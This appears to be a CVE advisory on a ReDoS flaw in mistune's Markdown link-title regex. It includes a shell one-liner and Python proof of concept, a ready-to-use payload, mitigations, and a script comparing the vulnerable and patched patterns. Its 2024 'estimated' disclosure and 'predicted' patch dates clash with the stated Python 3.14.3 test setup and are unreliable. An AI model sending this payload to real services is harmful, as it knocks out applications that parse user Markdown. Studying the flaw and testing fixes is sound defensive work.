The vulnerability resides in the `LINK_TITLE_RE` regex defined in `src/mistune/helpers.py` lines 20–25. The regex handles quoted titles in Markdown links. The double-quote branch is `r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"'`. With `PUNCTUATION` substituted, the quantified group is an alternation between an escaped punctuation character and any single character other than `"` or NUL. The issue is an ambiguous alternation: a backslash followed by a punctuation character (e.g., `\!`) can be matched in two ways – as a single escaped sequence `\!` (two characters) or as two separate characters `\` and `!` using the `[^"\x00]` class. The same ambiguity exists in the single-quote branch. When an input contains repeated `\!` pairs without a closing quote, the regex engine backtracks exponentially. Each pair doubles the possible match paths, leading to O(2^N) time complexity. For N=25 pairs (58-byte payload), the parser blocks for ~6 seconds on Apple M2, Python 3.14.3, mistune 3.2.0. This is reachable via two Markdown parsing paths: inline links `[text](url "PAYLOAD)` → `parse_link()` → `parse_link_title()`, and block link reference definitions `[bash]: url "PAYLOAD` → `BlockParser.parse_ref_link()` → `parse_link_title()`. The PoC shows exponential growth: N=15 (38 bytes) takes 0.007s, N=25 (58 bytes) takes 5.922s. The same attack works with block definitions.
DailyCVE form:
Platform: Python
Version: mistune 3.2.0 (and earlier)
Vulnerability: ReDoS (exponential backtracking)
Severity: Medium (5.5)
Date: 2024-07-09 (estimated disclosure)
Prediction: Patch expected 2024-07-19
What Undercode Say:
Test the ReDoS vulnerability on mistune 3.2.0 (shell one-liner):

```bash
# Test the ReDoS vulnerability on mistune 3.2.0
pip install mistune==3.2.0
python -c 'import mistune, time; md = mistune.create_markdown(); payload = "[x](y \"" + "\\!" * 25 + ")"; t = time.time(); md(payload); print(f"Elapsed: {time.time()-t:.3f}s")'
```

Improved PoC with timing measurement:

```python
# Improved PoC with timing measurement; N (number of `\!` pairs) defaults to 25
import mistune, time, sys

n = int(sys.argv[1]) if len(sys.argv) > 1 else 25
# Opening quote, N backslash-bang pairs, and no closing quote
payload = '[x](y "' + '\\!' * n + ')'
md = mistune.create_markdown()
start = time.perf_counter()
md(payload)
print(f'N={n} time={time.perf_counter()-start:.6f}s')
```
Exploit:
An attacker submits a Markdown string containing an opening quote, a sequence of `\!` pairs, and no closing quote. Example: [click](url "\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!\!"). The regex engine backtracks over all combinations, consuming CPU resources. With just 58 bytes, the parser stalls for seconds. Repeated requests can overwhelm a server.
Protection from this CVE:
Upgrade mistune to version 3.2.1 or newer where the fix is applied. Alternatively, patch the regex manually: change `r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"'` to `r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"'` (exclude backslash from the character class). Also apply to the single-quote branch. Implement input size limits (e.g., reject Markdown titles longer than 200 bytes) and use a timeout wrapper for Markdown parsing.
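To verify the patch rather than only time the parser, the following added example (not part of the advisory and not mistune's own code) rebuilds the double-quote branch described above in both its vulnerable and patched forms, times each against the unterminated-title input, and wraps the patched pattern in the size limit recommended in this section. The `PUNCTUATION` class is constructed from `string.punctuation` and is assumed to approximate mistune's; `unterminated_title`, `timed_match` and `title_match_within_limit` are hypothetical helper names.

```python
import re
import string
import time

# Assumption: mistune's PUNCTUATION is an ASCII punctuation character class;
# this constructed version approximates it for the demonstration.
PUNCTUATION = "[" + re.escape(string.punctuation) + "]"

# Double-quote branch of the link-title regex as the advisory describes it.
# Both `\\` + PUNCTUATION and `[^"\x00]` can consume a backslash, so every
# `\!` pair doubles the number of ways the starred group can be matched.
VULNERABLE_TITLE_RE = re.compile(r'"(?:\\' + PUNCTUATION + r'|[^"\x00])*"')

# Patched branch from the advisory: backslash is excluded from the character
# class, so a backslash can only be consumed by the escape alternative.
PATCHED_TITLE_RE = re.compile(r'"(?:\\' + PUNCTUATION + r'|[^"\\\x00])*"')


def unterminated_title(n: int) -> str:
    """Constructed input: opening quote, n backslash-bang pairs, no closing quote."""
    return '"' + "\\!" * n


def timed_match(pattern: re.Pattern, text: str) -> tuple:
    """Return (matched, elapsed_seconds) for pattern.match(text)."""
    start = time.perf_counter()
    matched = pattern.match(text) is not None
    return matched, time.perf_counter() - start


def title_match_within_limit(text: str, max_len: int = 200):
    """Defensive wrapper following the advisory's advice: refuse oversized
    titles before any regex runs, then use the patched pattern.
    Returns a match object or None (None is treated as 'no title')."""
    if len(text) > max_len:
        return None
    return PATCHED_TITLE_RE.match(text)


if __name__ == "__main__":
    for n in (10, 14, 18):
        _, vuln_s = timed_match(VULNERABLE_TITLE_RE, unterminated_title(n))
        _, fixed_s = timed_match(PATCHED_TITLE_RE, unterminated_title(n))
        print(f"N={n:2d} vulnerable={vuln_s:.4f}s patched={fixed_s:.6f}s")
    # A normal title with escaped quotes is accepted by both patterns.
    ok = '"a \\"quoted\\" title"'
    print("valid title accepted by both:",
          VULNERABLE_TITLE_RE.match(ok) is not None,
          PATCHED_TITLE_RE.match(ok) is not None)
```

Running the script shows the vulnerable pattern's time roughly doubling with each additional pair while the patched pattern fails in microseconds, because each backslash now has exactly one way to be consumed. One trade-off to check before applying the manual patch: with backslash removed from the class, a title containing a backslash followed by a non-punctuation character (for example `"c:\temp"`) no longer matches at all, whereas the original pattern accepted it; a parser that must keep that behaviour needs a different disambiguation, such as a separate alternative for a backslash not followed by punctuation.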
Impact:
Denial of service. Any application that parses user-supplied Markdown with mistune becomes unresponsive. This includes web comment boxes, documentation systems, API endpoints accepting Markdown, and Jupyter nbconvert. The attack payload is under 100 bytes, making it easy to send in a single request. A crafted 58-byte payload causes 6 seconds of blocking on a modern CPU, and longer on slower hardware.
Sources:
Reported By: github.com